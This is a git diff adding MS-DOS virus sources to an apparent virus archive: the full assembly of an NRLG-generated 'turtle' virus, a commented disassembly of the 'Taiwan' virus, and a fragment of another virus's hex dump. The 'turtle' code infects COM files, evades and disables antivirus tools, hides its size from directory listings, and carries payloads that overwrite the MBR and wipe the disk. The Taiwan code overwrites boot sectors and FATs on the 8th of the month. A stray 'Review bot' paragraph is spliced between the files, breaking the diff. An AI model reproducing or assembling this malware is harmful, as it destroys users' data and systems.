+28F8:0270 B0 05 2E A2 C0 02 B9 04-00 BA BD 02 8C C8 8E D8 ................ +28F8:0280 B4 40 E8 2B 00 B4 42 B0-02 B9 00 00 8B D1 E8 1F .@.+..B......... +28F8:0290 00 BA 00 01 B9 00 02 B4-40 E8 14 00 B4 3E E8 0F ........@....>.. +28F8:02A0 00 5E 5F 5A 59 5B 58 07-1F 90 2E FF 2E B7 02 CF .^_ZY[X......... +28F8:02B0 9C 2E FF 1E B7 02 C3 16-13 0C 02 02 00 E9 06 06 ................ +28F8:02C0 05 E9 06 04 05 01 00 00-00 00 01 F0 09 01 .............. + + ;Kirand szveg kezdete +28F8:02C0 54 75 Tu +28F8:02D0 72 62 6F 20 4B 75 6B 61-63 20 39 2E 39 20 20 20 rbo Kukac 9.9 +28F8:02E0 20 20 20 24 $ + +28F8:02E0 00 00 00 00-00 00 00 00 00 00 00 00 ............ +28F8:02F0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 FA 00 ................ +28F8:0300 C7 . 
+
+;****************************************************************************;
+; ;
+; -=][][][][][][][][][][][][][][][=- ;
+; -=] P E R F E C T C R I M E [=- ;
+; -=] +31.(o)79.426o79 [=- ;
+; -=] [=- ;
+; -=] For All Your H/P/A/V Files [=- ;
+; -=] SysOp: Peter Venkman [=- ;
+; -=] [=- ;
+; -=] +31.(o)79.426o79 [=- ;
+; -=] P E R F E C T C R I M E [=- ;
+; -=][][][][][][][][][][][][][][][=- ;
+; ;
+; *** NOT FOR GENERAL DISTRIBUTION *** ;
+; ;
+; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
+; Around Among the General Public. It Will be Very Useful for Learning how ;
+; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
+; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
+; Experience can Turn it Into a far More Malevolent Program Than it Already ;
+; Is. Keep This Code in Responsible Hands! ;
+; ;
+;****************************************************************************;
diff --git a/MSDOS/Virus.MSDOS.Unknown.turtle.asm b/MSDOS/Virus.MSDOS.Unknown.turtle.asm
new file mode 100644
index 00000000..a45cc0c8
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.turtle.asm
@@ -0,0 +1,590 @@ +;Ŀ +; THiS iS a [NuKE] RaNDoMiC LiFe GeNeRaToR ViRuS. [NuKE] PoWeR +; CReaTeD iS a N.R.L.G. PRoGRaM V0.66 BeTa TeST VeRSioN [NuKE] WaReZ +; auToR: aLL [NuKE] MeMeBeRS [NuKE] PoWeR +; [NuKE] THe ReaL PoWeR! [NuKE] WaReZ +; NRLG WRiTTeR: AZRAEL (C) [NuKE] 1994 [NuKE] PoWeR +; + +.286 +code segment +assume cs:code,ds:code +org 100h + +start: CALL NEXT + +NEXT: + mov di,sp ;take the stack pointer location + mov bp,ss:[di] ;take the "DELTA HANDLE" for my virus + sub bp,offset next ;subtract the large code off this code + ; +;******************************************************************* +; #1 DECRYPT ROUTINE +;******************************************************************* + +cmp byte ptr cs:[crypt],0b9h ;is the first runnig? +je crypt2 ;yes! not decrypt +;---------------------------------------------------------- +mov cx,offset fin ;cx = large of virus +lea di,[offset crypt]+ bp ;di = first byte to decrypt +mov dx,1 ;dx = value for decrypt +;---------------------------------------------------------- +deci: ;deci = fuck label! +;---------------------------------------------------------- + +inc di +inc di +;---------------------------------------------------------- +jmp bye ;######## BYE BYE F-PROT ! ########## +mov ah,4ch +int 21h +bye: ;#### HEY FRIDRIK! IS ONLY A JMP!!### +;----------------------------------------------------------- +mov ah,0bh ;######### BYE BYE TBAV ! ########## +int 21h ;### (CANGE INT AT YOU PLEASURE) ### +;---------------------------------------------------------- +loop deci ;repeat please! + ; +;***************************************************************** +; #2 DECRYPT ROUTINE +;***************************************************************** + ; +crypt: ;fuck label! + ; +mov cx,offset fin ;cx = large of virus +lea di,[offset crypt2] + bp ;di = first byte to decrypt +;--------------------------------------------------------------- +deci2: ; +xor byte ptr cs:[di],1 ;decrytion rutine +inc di ;very simple... 
+loop deci2 ; +;--------------------------------------------------------------- +crypt2: ;fuck label! + ; +MOV AX,0CACAH ;call to my resident interrup mask +INT 21H ;for chek "I'm is residet?" +CMP Bh,0CAH ;is equal to CACA? +JE PUM2 ;yes! jump to runnig program +call action +;***************************************************************** +; NRLG FUNCTIONS (SELECTABLE) +;***************************************************************** + +call MBR +call TRASH_RN +call ANTI_V +;**************************************************************** +; PROCESS TO REMAIN RESIDENT +;**************************************************************** + +mov ax,3521h +int 21h ;store the int 21 vectors +mov word ptr [bp+int21],bx ;in cs:int21 +mov word ptr [bp+int21+2],es ; +;--------------------------------------------------------------- +push cs ; +pop ax ;ax = my actual segment +dec ax ;dec my segment for look my MCB +mov es,ax ; +mov bx,es:[3] ;read the #3 byte of my MCB =total used memory +;--------------------------------------------------------------- +push cs ; +pop es ; +sub bx,(offset fin - offset start + 15)/16 ;subtract the large of my virus +sub bx,17 + offset fin ;and 100H for the PSP total +mov ah,4ah ;used memory +int 21h ;put the new value to MCB +;--------------------------------------------------------------- +mov bx,(offset fin - offset start + 15)/16 + 16 + offset fin +mov ah,48h ; +int 21h ;request the memory to fuck DOS! 
+;--------------------------------------------------------------- +dec ax ;ax=new segment +mov es,ax ;ax-1= new segment MCB +mov byte ptr es:[1],8 ;put '8' in the segment +;-------------------------------------------------------------- +inc ax ; +mov es,ax ;es = new segment +lea si,[bp + offset start] ;si = start of virus +mov di,100h ;di = 100H (psp position) +mov cx,offset fin - start ;cx = lag of virus +push cs ; +pop ds ;ds = cs +cld ;mov the code +rep movsb ;ds:si >> es:di +;-------------------------------------------------------------- +mov dx,offset virus ;dx = new int21 handler +mov ax,2521h ; +push es ; +pop ds ; +int 21h ;set the vectors +;------------------------------------------------------------- +pum2: ; + ; +mov ah,byte ptr [cs:bp + real] ;restore the 3 +mov byte ptr cs:[100h],ah ;first bytes +mov ax,word ptr [cs:bp + real + 1] ; +mov word ptr cs:[101h],ax ; +;------------------------------------------------------------- +mov ax,100h ; +jmp ax ;jmp to execute + ; +;***************************************************************** +;* HANDLER FOR THE INT 21H +;***************************************************************** + ; +VIRUS: ; + ; +cmp ah,4bh ;is a 4b function? +je REPRODUCCION ;yes! jump to reproduce ! +cmp ah,11h +je dir +cmp ah,12h +je dir +dirsal: +cmp AX,0CACAH ;is ... a caca function? (resident chek) +jne a3 ;no! jump to a3 +mov bh,0cah ;yes! put ca in bh +a3: ; +JMP dword ptr CS:[INT21] ;jmp to original int 21h +ret ; +make db '[NuKE] N.R.L.G. 
AZRAEL' +dir: +jmp dir_s +;------------------------------------------------------------- +REPRODUCCION: ; + ; +pushf ;put the register +pusha ;in the stack +push si ; +push di ; +push bp ; +push es ; +push ds ; +;------------------------------------------------------------- +push cs ; +pop ds ; +mov ax,3524H ;get the dos error control +int 21h ;interupt +mov word ptr error,es ;and put in cs:error +mov word ptr error+2,bx ; +mov ax,2524H ;change the dos error control +mov dx,offset all ;for my "trap mask" +int 21h ; +;------------------------------------------------------------- +pop ds ; +pop es ;restore the registers +pop bp ; +pop di ; +pop si ; +popa ; +popf ; +;------------------------------------------------------------- +pushf ;put the registers +pusha ; +push si ;HEY! AZRAEL IS CRAZY? +push di ;PUSH, POP, PUSH, POP +push bp ;PLEEEEEAAAAAASEEEEEEEEE +push es ;PURIFY THIS SHIT! +push ds ; +;------------------------------------------------------------- +mov ax,4300h ; +int 21h ;get the file +mov word ptr cs:[attrib],cx ;atributes +;------------------------------------------------------------- +mov ax,4301h ;le saco los atributos al +xor cx,cx ;file +int 21h ; +;------------------------------------------------------------- +mov ax,3d02h ;open the file +int 21h ;for read/write +mov bx,ax ;bx=handle +;------------------------------------------------------------- +mov ax,5700h ; +int 21h ;get the file date +mov word ptr cs:[hora],cx ;put the hour +mov word ptr cs:[dia],dx ;put the day +and cx,word ptr cs:[fecha] ;calculate the seconds +cmp cx,word ptr cs:[fecha] ;is ecual to 58? (DEDICATE TO N-POX) +jne seguir ;yes! the file is infected! 
+jmp cerrar ; +;------------------------------------------------------------ +seguir: ; +mov ax,4202h ;move the pointer to end +call movedor ;of the file +;------------------------------------------------------------ +push cs ; +pop ds ; +sub ax,3 ;calculate the +mov word ptr [cs:largo],ax ;jmp long +;------------------------------------------------------------- +mov ax,04200h ;move the pointer to +call movedor ;start of file +;---------------------------------------------------------- +push cs ; +pop ds ;read the 3 first bytes +mov ah,3fh ; +mov cx,3 ; +lea dx,[cs:real] ;put the bytes in cs:[real] +int 21h ; +;---------------------------------------------------------- +cmp word ptr cs:[real],05a4dh ;the 2 first bytes = 'MZ' ? +jne er1 ;yes! is a EXE... fuckkk! +;---------------------------------------------------------- +jmp cerrar +er1: +;---------------------------------------------------------- +mov ax,4200h ;move the pointer +call movedor ;to start fo file +;---------------------------------------------------------- +push cs ; +pop ds ; +mov ah,40h ; +mov cx,1 ;write the JMP +lea dx,[cs:jump] ;instruccion in the +int 21h ;fist byte of the file +;---------------------------------------------------------- +mov ah,40h ;write the value of jmp +mov cx,2 ;in the file +lea dx,[cs:largo] ; +int 21h ; +;---------------------------------------------------------- +mov ax,04202h ;move the pointer to +call movedor ;end of file +;---------------------------------------------------------- +push cs ; +pop ds ;move the code +push cs ;of my virus +pop es ;to cs:end+50 +cld ;for encrypt +mov si,100h ; +mov di,offset fin + 50 ; +mov cx,offset fin - 100h ; +rep movsb ; +;---------------------------------------------------------- +mov cx,offset fin +mov di,offset fin + 50 + (offset crypt2 - offset start) ;virus +enc: ; +xor byte ptr cs:[di],1 ;encrypt the virus +inc di ;code +loop enc ; +;--------------------------------------------------------- +mov cx,offset fin +mov di,offset 
fin + 50 + (offset crypt - offset start) ;virus +mov dx,1 +enc2: ; + +inc di +inc di ;the virus code +loop enc2 ; +;-------------------------------------------- +mov ah,40h ; +mov cx,offset fin - offset start ;copy the virus +mov dx,offset fin + 50 ;to end of file +int 21h ; +;---------------------------------------------------------- +cerrar: ; + ;restore the +mov ax,5701h ;date and time +mov cx,word ptr cs:[hora] ;file +mov dx,word ptr cs:[dia] ; +or cx,word ptr cs:[fecha] ;and mark the seconds +int 21h ; +;---------------------------------------------------------- +mov ah,3eh ; +int 21h ;close the file +;---------------------------------------------------------- +pop ds ; +pop es ;restore the +pop bp ;registers +pop di ; +pop si ; +popa ; +popf ; +;---------------------------------------------------------- +pusha ; + ; +mov ax,4301h ;restores the atributes +mov cx,word ptr cs:[attrib] ;of the file +int 21h ; + ; +popa ; +;---------------------------------------------------------- +pushf ; +pusha ; 8-( = f-prot +push si ; +push di ; 8-( = tbav +push bp ; +push es ; 8-) = I'm +push ds ; +;---------------------------------------------------------- +mov ax,2524H ; +lea bx,error ;restore the +mov ds,bx ;errors handler +lea bx,error+2 ; +int 21h ; +;---------------------------------------------------------- +pop ds ; +pop es ; +pop bp ;restore the +pop di ;resgisters +pop si ; +popa ; +popf ; +;---------------------------------------------------------- +JMP A3 ;jmp to orig. 
INT 21 + ; +;********************************************************** +; SUBRUTINES AREA +;********************************************************** + ; +movedor: ; + ; +xor cx,cx ;use to move file pointer +xor dx,dx ; +int 21h ; +ret ; +;---------------------------------------------------------- +all: ; + ; +XOR AL,AL ;use to set +iret ;error flag + +;*********************************************************** +; DATA AREA +;*********************************************************** +largo dw ? +jump db 0e9h +real db 0cdh,20h,0 +hora dw ? +dia dw ? +attrib dw ? +int21 dd ? +error dd ? + +;--------------------------------- +action: ; +MOV AH,2AH ; +INT 21H ;get date +CMP Dl,byte ptr cs:[action_dia+bp] ;is equal to my day? +JE cont ;nop! fuck ret +cmp byte ptr cs:[action_dia+bp],32 ; +jne no_day ; +cont: ; +cmp dh,byte ptr cs:[action_mes+bp] ;is equal to my month? +je set ; +cmp byte ptr cs:[action_mes+bp],13 ; +jne NO_DAY ;nop! fuck ret +set: ; + +mov ax,351ch ; +int 21h ;store the int 1ch vectors +mov word ptr [trampaint+bp],bx ;in cs:trampaint +mov word ptr [trampaint+2+bp],es ; +mov ax,251ch ;put the int 1ch (clock) vector +push cs ; +pop ds ; +mov dx,offset tardar ;in offset tardar +int 21h ; +mov dx,offset fin ; +int 27h ;main resident the code +NO_DAY: ; +ret ;ret for program +tardar: ;int 1c handler +pushf ; +pusha ; +mov cx,0ffffh ;fuck loop for slow speed +trampa: ; +mov ax,ax ; +loop trampa ; +popa ; +popf ; +JMP dword ptr CS:[trampaint+bp] ;jmp to original int 1ch +ret ; +trampaint dd ? 
; +;--------------------------------; + +MBR: +;************************************** +; Start of MBR-BOMB writing +;************************************** +mov ax,9f80h ;very high memory +mov es,ax ;good for buffer +mov ax,0201h ;read the original +mov cx,0001h ;MBR of the disk +mov dx,0080h ; +xor bx,bx ;to buffer 9f80:0000h +int 13h ; +push cs ; +pop ds ; +mov ax,9f80h ;add my MBR-BOMB +mov es,ax ;to real MBR in my +mov si,offset fat ;buffer +xor di,di ; +mov cx,105 ;ds:[fat]=>9f80:0000h +repe movsb ;total 105bytes +mov ax,9f80h ; +mov es,ax ; +xor bx,bx ;replace the original +mov ax,0301h ;MBR in the disk by the +xor ch,ch ;new MBR-BOMB. +mov dx,0080h ; +mov cl,1 ;WARNING! VSAFE/MSAVE +mov bx,0 ;NOTIFY THIS ACTION +int 13h ; +ret ; +;--------------------------------------------------- +;********************* +; Start of MBR code +;********************* +fat: ; +cli ;# +xor ax,ax ;# +mov ss,ax ;# +mov sp,7C00h ;# +mov si,sp ;# +push ax ;# +pop es ;# +push ax ;# +pop ds ;# +sti ;# + ;# +pushf ;# +push ax ;# +push cx ;# = This code be in the +push dx ;# original MBR +push ds ;# (NOT MODIFY) +push es ;# +MOV AH,04H ; Read real tyme +INT 1AH ; Clock +CMP DH,cs:byte ptr action_mes ; is Month? +JE CAGO ; yes! SNIF SNIF HD. 
+lit: +pop es +pop ds +pop dx +pop cx +pop ax +popf +jmp booti +CAGO: +;++++++++++++++++++++++++++++++++++++++++++++++++++++ +; START OF YOUR DESTRUCTIVE CODE (or not destructive) +;++++++++++++++++++++++++++++++++++++++++++++++++++++ + +rip_hd: + ;@ + xor dx, dx ;@ +rip_hd1: ;@ + mov cx, 2 ;@ + mov ax, 311h ;@ + mov dl, 80h ;@ + mov bx, 5000h ;@ + mov es, bx ;@ + int 13h ;@ + jae rip_hd2 ;@ + xor ah, ah ;@ + int 13h ;@ + rip_hd2: ;@ + inc dh ;@ + cmp dh, 4 ;@ + jb rip_hd1 ;@ + inc ch ;@ + jmp rip_hd + +;+++++++++++++++++++++++++++++++++++++++++++ +; END OF YOUR DESTRUCUTIVE CODE +;+++++++++++++++++++++++++++++++++++++++++++ +booti: +xor ax,ax ;# +mov es,ax ;# +mov bx,7c00h ;# +mov ah,02 ;# +mov al,1 ;# +mov cl,1 ;# #= This code be +mov ch,0 ;# in the original +mov dh,1 ;# MBR +mov dl,80h ;# (NOT MODIFY) + ;# +int 13h ;# + ;# +db 0eah,00,7ch,00,00 ;# +;******************* +; END OF MBR CODE +;******************* + +;--------------------------------- +TRASH_RN: ; +MOV AH,2DH ; +INT 21H ;get date +CMP Dl,6 ;is =6 (RAN 0-99) +jne NO_DAYY ;nop! fuck ret +mov ah,0dh ; +int 21h ;reset disk +mov al,2 ; +mov cx,0ffffh ; +mov dx,0 ; +int 26h ;fuck ffffh sector +mov ah,0dh ;reste disk +int 21h ; +mov al,2 ; +mov cx,0ffffh ; +mov dx,0ffffh ;new fuck+ +int 26h ;heheheh!!! +NO_DAYY: ; +ret ; +;--------------------------------- +;--------------------------------- +ANTI_V: ; +MOV AX,0FA01H ;REMOVE VSAFE FROM MEMORY +MOV DX,5945H ; +INT 21H ; +ret ; +;--------------------------------- + +;***************************************************** +dir_s: + pushf + push cs + call a3 ;Get file Stats + test al,al ;Good FCB? + jnz no_good ;nope + push ax + push bx + push es + mov ah,51h ;Is this Undocmented? huh... 
+ int 21h + mov es,bx + cmp bx,es:[16h] + jnz not_infected + mov bx,dx + mov al,[bx] + push ax + mov ah,2fh ;Get file DTA + int 21h + pop ax + inc al + jnz fcb_okay + add bx,7h +fcb_okay: mov ax,es:[bx+17h] + and ax,1fh ;UnMask Seconds Field + xor al,byte ptr cs:fechad + jnz not_infected + and byte ptr es:[bx+17h],0e0h + sub es:[bx+1dh],OFFSET FIN - OFFSET START ;Yes minus virus size + sbb es:[bx+1fh],ax +not_infected:pop es + pop bx + pop ax +no_good: iret +;******************************************************************** +; THIS DIR STEALTH METOD IS EXTRAC FROM NUKEK INFO JOURNAL 4 & N-POX +;********************************************************************* + +action_dia Db 01H ;day for the action +action_mes Db 01H ;month for the action +FECHA DW 01eH ;Secon for mark +FECHAd Db 01eH ;Secon for mark dir st +fin: +code ends +end start diff --git a/MSDOS/Virus.MSDOS.Unknown.tw.asm b/MSDOS/Virus.MSDOS.Unknown.tw.asm new file mode 100644 index 00000000..62210b60 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.tw.asm 
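Review bot: At the end of REPRODUCCION the critical-error vector is not restored: `mov ax,2524H / lea bx,error / mov ds,bx / lea bx,error+2 / int 21h` loads DS with the offset of `error` and never sets DX, while AH=25h takes the new handler in DS:DX, and the earlier save (`mov word ptr error,es` then `mov word ptr error+2,bx`) stores segment before offset, so after every infection INT 24h is left pointing at whatever DS:DX then hold — a post-infection artefact an analyst can look for — and while the file is being written the installed `all:` handler (`xor al,al / iret`) answers every critical error with "ignore". A comment rather than a repair belongs here: `; BUG: AH=25h expects DS:DX; the saved INT 24h vector is never reinstalled`. The infection marker also deserves a comment next to FECHA: the `and cx,[fecha] / cmp cx,[fecha]` test and the `or cx,[fecha]` before AH=5701h mean bits 1-4 of the file-time seconds field are all set (a 60- or 62-second timestamp), and `dir_s` hides exactly that (`and byte ptr es:[bx+17h],0e0h`) and subtracts OFFSET FIN - OFFSET START from the size in FCB find results, so the marker and the size growth are only visible from a clean boot rather than through DIR on the infected system. The MBR routine's own comment already records that the AH=03h write to cylinder 0, head 0, sector 1 of drive 80h is what VSAFE/MSAV flag.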
@@ -0,0 +1,407 @@ + +PAGE 60,132 + +; ͻ +; Progrming Research Group T.R.A.U.M.A. +; Universidade Autonoma de Lisboa +; The 'Taiwan' Virus +; Disassembled by J.L. and J.C, Feb 1990 +; +; Not Copyrighted (c) Jean Luz. +; +; This listing is only to be made available to TRAUMA researchers +; +; ͼ + +; The disassembly has been tested by re-assembly using MASM 5.1 + +data_1e equ 58h ; (0000:0058=0A9Ch) +data_2e equ 5Ah ; (0000:005A=0D81h) +data_3e equ 475h ; (0000:0475=2) +data_7e equ 95h ; (76AC:0095=0A1h) +data_8e equ 96h ; (76AC:0096=58h) +data_9e equ 98h ; (76AC:0098=44A3h) +data_10e equ 9Ah ; (76AC:009A=2601h) +data_11e equ 9Eh ; (76AC:009E=0) +data_12e equ 114h ; (76AC:0114=0BAh) +data_13e equ 13Eh ; (76AC:013E=9Eh) +data_14e equ 13Fh ; (76AC:013F=0) +data_15e equ 140h ; (76AC:0140=21CDh) +data_16e equ 142h ; (76AC:0142=0B4h) +data_17e equ 143h ; (76AC:0143=3Dh) +data_18e equ 144h ; (76AC:0144=2B0h) +data_19e equ 146h ; (76AC:0146=9EBAh) +data_20e equ 148h ; (76AC:0148=0) +data_21e equ 14Bh ; (76AC:014B=8Bh) +data_22e equ 17Ah ; (76AC:017A=40h) + +code_seg_a segment + assume cs:code_seg_a, ds:code_seg_a + + + +tw proc far + jmp short loc_a + db 0B0h, 67h, 3Ch, 67h + db 0CFh, 2Ah, 2Eh, 63h, 6Fh, 6Dh + db 0, 2Ah, 0, 5Ch, 0, 2Eh + db 2Eh, 0, 0, 5Ch, 0 + db 31h + db 40 dup (0) + db 64h, 0, 0, 0, 50h, 10h + db 0, 0FCh, 0, +loc_a: jmp short loc_1 + db 0EDh + db 0D8h, 0CFh, 0CFh, 0DEh, 0C3h, 0C4h + db 0CDh, 0D9h, 8Ah, 0CCh, 0D8h, 0C5h + db 0C7h, 8Ah, 0E4h, 0CBh, 0DEh, 0C3h + db 0C5h, 0C4h, 0CBh, 0C6h, 8Ah, 0E9h + db 0CFh, 0C4h, 0DEh, 0D8h, 0CBh, 0C6h + db 8Ah, 0FFh, 0C4h, 0C3h, 0DCh, 0CFh + db 0D8h, 0D9h, 0C3h, 0DEh, 0D3h, 8Ah + db 8Bh, 0Ah, 0Dh, 24h, 0E3h, 0D9h + db 8Ah, 0DEh, 0C5h, 0CEh, 0CBh, 0D3h + db 8Ah, 0D9h, 0DFh, 0C4h, 0C4h, 0D3h + db 8Ah, 95h + db 0Ah, 0Dh, 24h +loc_1: + cli ; Disable interrupts + push es + mov ax,0 + mov es,ax +; +; To begin, let's read and change some interrupts - replacing one with other +; + mov ax,es:data_1e ; (0000:0058=0A9Ch) + mov 
ds:data_18e,ax ; (76AC:0144=2B0h) + mov ax,es:data_2e ; (0000:005A=0D81h) + mov ds:data_19e,ax ; (76AC:0146=9EBAh) + mov word ptr es:data_1e,102h ; (0000:0058=0A9Ch) + mov es:data_2e,cs ; (0000:005A=0D81h) + pop es +; +; now reprogram the primary interrupt controller (the only one on the PC/XT) + in al,21h ; port 21h, 8259-1 int IMR + or al,2 + out 21h,al ; port 21h, 8259-1 int comands + sti ; Enable interrupts + mov cx,80h + mov si,0 + mov bx,80h + +locloop_2: + mov ax,[bx+si] + push ax + inc si + inc si + loop locloop_2 ; Loop if cx > 0 + + mov byte ptr ds:data_12e,0 ; (76AC:0114=0BAh) + mov byte ptr ds:data_13e,0 ; (76AC:013E=9Eh) + mov byte ptr ds:data_14e,0 ; (76AC:013F=0) + mov byte ptr ds:data_20e,0 ; (76AC:0148=0) + mov ah,19h + int 21h ; DOS Services ah=function 19h + ; get default drive al (0=a:) + ; then store it + mov ds:data_12e,al ; (76AC:0114=0BAh) + mov ds:data_17e,al ; (76AC:0143=3Dh) + mov ah,47h + mov dl,0 + mov si,116h + int 21h ; DOS Services ah=function 47h + ; get full pathname for current drive + ; putting it in the buffer pointed to by SI + push ds + mov ax,0 + mov ds,ax + mov al,ds:data_3e ; (0000:0475=2) + pop ds + mov ds:data_16e,al ; (76AC:0142=0B4h) + cmp al,0 + je loc_3 ; Jump if equal (drive c) + mov ah,0Eh + mov dl,2 + mov ds:data_17e,dl ; (76AC:0143=3Dh) + int 21h ; DOS Services ah=function 0Eh + ; set default drive C: +loc_3: + mov ah,3Bh ; ';' + mov dx,10Fh + int 21h ; DOS Services ah=function 3Bh + ; set current dir, path \ +loc_4: + mov ah,4Eh ; 'N' + mov cx,3 + mov dx,107h + int 21h ; DOS Services ah=function 4Eh + ; find 1st filenam match (*.com) + jnc loc_5 ; Jump if carry=0 (if found) + jmp loc_8 +loc_5: + mov ax,ds:data_8e ; (76AC:0096=58h) + and ax,1Fh + cmp al,1Fh + jne loc_6 ; Jump if not equal + jmp loc_7 +loc_6: +; Now it has found a .COM file, opens it then writes itself to it +; and here it makes it's biggest mistake: it writes itself to the OS files, +; leaving them inoperational + + mov ax,ds:data_10e ; 
(76AC:009A=2601h) + mov ds:data_15e,ax ; (76AC:0140=21CDh) + mov ah,43h ; 'C' + mov al,1 + mov cl,ds:data_7e ; (76AC:0095=0A1h) + and cx,0FEh + mov dx,9Eh + int 21h ; DOS Services ah=function 43h + ; get/set file attrb, file found + mov ah,3Dh ; '=' + mov al,2 + mov dx,9Eh + int 21h ; DOS Services ah=function 3Dh + ; open file, al=mode,name@ds:dx + mov bx,ax + mov ah,3Fh ; '?' + mov cx,2E7h + mov dx,0F800h + int 21h ; DOS Services ah=function 3Fh + ; read file, cx=bytes, to ds:dx + mov ah,42h ; 'B' + mov al,0 + mov cx,0 + mov dx,0 + int 21h ; DOS Services ah=function 42h + ; move file ptr, cx,dx=offset + mov ah,40h ; '@' + mov cx,2E7h + mov dx,100h + int 21h ; DOS Services ah=function 40h + ; write file cx=bytes, to ds:dx + mov ah,42h ; 'B' + mov al,2 + mov cx,0 + mov dx,0 + int 21h ; DOS Services ah=function 42h + ; move file ptr, cx,dx=offset + mov ah,40h ; '@' + mov cx,2E7h + mov dx,0F800h + int 21h ; DOS Services ah=function 40h + ; write file cx=bytes, to ds:dx + mov ah,57h ; 'W' + mov al,1 + mov cx,ds:data_8e ; (76AC:0096=58h) + mov dx,ds:data_9e ; (76AC:0098=44A3h) + or cl,1Fh + int 21h ; DOS Services ah=function 57h + ; get/set file date & time + mov ah,43h ; 'C' + mov al,1 + mov cl,ds:data_7e ; (76AC:0095=0A1h) + mov dx,9Eh + int 21h ; DOS Services ah=function 43h + ; get/set file attrb, nam@ds:dx + mov ah,3Eh ; '>' + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle + inc byte ptr ds:data_13e ; (76AC:013E=9Eh) + cmp byte ptr ds:data_13e,3 ; (76AC:013E=9Eh) + je loc_15 ; Jump if equal +loc_7: + mov ah,4Fh ; 'O' + int 21h ; DOS Services ah=function 4Fh + ; find next filename match + jc loc_8 ; Jump if carry Set (if no more .com files) + jmp loc_5 ; infect next file + +loc_8: +; Now (I'm not sure about this) I think it's looking for subdirectories, so it can spread there +; too. 
+ mov ah,4Eh ; 'N' + mov dx,10Dh + mov cx,12h + int 21h ; DOS Services ah=function 4Eh + ; find 1st filenam match @ds:dx + jc loc_13 ; Jump if carry Set + +loc_9: + cmp byte ptr ds:data_11e,2Eh ; (76AC:009E=0) '.' + jne loc_11 ; Jump if not equal +loc_10: + mov ah,4Fh ; 'O' + int 21h ; DOS Services ah=function 4Fh + ; find next filename match + jnc loc_9 ; Jump if carry=0 + jmp short loc_13 +loc_11: + mov ah,3Bh ; ';' + mov dx,9Eh + int 21h ; DOS Services ah=function 3Bh + ; set current dir, path @ ds:dx + jc loc_10 ; Jump if carry Set + mov cx,0Bh + mov si,0 + mov bx,80h + +locloop_12: + mov ax,[bx+si] + push ax + inc si + inc si + loop locloop_12 ; Loop if cx > 0 + + inc byte ptr ds:data_14e ; (76AC:013F=0) + jmp loc_4 +; yes, it should have been directories, for now it has changed the path and has gone +; off infecting files again +loc_13: +; if it has found them all, it goes on to the next wickedness... + cmp byte ptr ds:data_14e,0 ; (76AC:013F=0) + je loc_15 ; Jump if equal + dec byte ptr ds:data_14e ; (76AC:013F=0) + mov ah,3Bh ; ';' + mov dx,111h + int 21h ; DOS Services ah=function 3Bh + ; set current dir, path @ ds:dx + mov cx,0Bh + mov di,14h + mov bx,80h + +locloop_14: + pop ax + mov [bx+di],ax + dec di + dec di + loop locloop_14 ; Loop if cx > 0 + + mov ah,4Fh ; 'O' + int 21h ; DOS Services ah=function 4Fh + ; find next filename match + jc loc_13 ; Jump if carry Set + jmp short loc_9 +loc_15: +; Finally, it it wasn't bugged and very amateurish +; (making the infected files useless) +; it would check for a date and then destroy the current disk if it was that date +; ( The 8 of each month. Why???) 
+ mov ah,2Ah ; '*' + int 21h ; DOS Services ah=function 2Ah + ; get date, cx=year, dx=mon/day + cmp dl,8 + jne loc_16 ; Jump if not equal + mov byte ptr ds:data_20e,1 ; (76AC:0148=0) + mov al,ds:data_17e ; (76AC:0143=3Dh) + mov cx,0A0h + mov dx,0 + mov bx,0 + int 26h ; Absolute disk write, drive al +; Write over the boot sector (and the partition table, if it's a hard disk), +;the root directory and probably both FATs (if the DOS partition is the first +; on the HD, off course), then try doing the same to second HD) + popf ; Pop flags + cmp byte ptr ds:data_16e,2 ; (76AC:0142=0B4h) + jne loc_17 ; Jump if not equal + mov al,3 + mov cx,0A0h + mov dx,0 + mov bx,0 + int 26h ; Absolute disk write, drive al + popf ; Pop flags + jmp short loc_17 +loc_16: + mov ah,0Eh + mov dl,ds:data_12e ; (76AC:0114=0BAh) + int 21h ; DOS Services ah=function 0Eh + ; set default drive dl (0=a:) + mov ah,3Bh ; ';' + mov dx,115h + int 21h ; DOS Services ah=function 3Bh + ; set current dir, path @ ds:dx +; Now change the interrupts again +loc_17: + cli ; Disable interrupts + push es + mov ax,0 + mov es,ax + mov ax,ds:data_18e ; (76AC:0144=2B0h) + mov es:data_1e,ax ; (0000:0058=0A9Ch) + mov ax,ds:data_19e ; (76AC:0146=9EBAh) + mov es:data_2e,ax ; (0000:005A=0D81h) + pop es + in al,21h ; port 21h, 8259-1 int IMR + and al,0FDh + out 21h,al ; port 21h, 8259-1 int comands + sti ; Enable interrupts + cmp byte ptr ds:data_20e,1 ; (76AC:0148=0) + jne loc_20 ; Jump if not equal + mov cx,2Ch + mov di,0 + mov bx,14Bh + +locloop_18: + xor byte ptr [bx+di],0AAh + inc di + loop locloop_18 ; Loop if cx > 0 + + mov cx,10h + mov di,0 + mov bx,17Ah + +locloop_19: +; Finally write something on the screen, it seems like blanks +; wait for for a keypress (doesn't matter which) then jump somewhere I can't understand. 
+ + xor byte ptr [bx+di],0AAh + inc di + loop locloop_19 ; Loop if cx > 0 + + mov ah,9 + mov dx,data_21e ; (76AC:014B=8Bh) + int 21h ; DOS Services ah=function 09h + ; display char string at ds:dx + mov ah,9 + mov dx,data_22e ; (76AC:017A=40h) + int 21h ; DOS Services ah=function 09h + ; display char string at ds:dx + mov ah,7 + int 21h ; DOS Services ah=function 07h + ; get keybd char al, no echo +loc_20: + mov cx,80h + mov di,0FEh + mov bx,80h + +locloop_21: + pop ax + mov [bx+di],ax + dec di + dec di + loop locloop_21 ; Loop if cx > 0 + + mov cx,8 + mov si,3DFh + mov di,0F800h + cld ; Clear direction + rep movsb ; Rep while cx>0 Mov [si] to es:[di] + mov cx,2E7h + mov si,ds:data_15e ; (76AC:0140=21CDh) + add si,100h + jmp $+0 ;replaced a jump to an inexistant loc_22 + db 0BFh, 0, 1, 0F3h, 0A4h, 0E9h + db 0F8h, 8, 0EBh + db 5Dh + db 93 dup (90h) + db 0B8h, 0, 0, 0CDh, 21h + db 643 dup (0) + +tw endp + +code_seg_a ends + + + + end + \ No newline at end of file diff --git 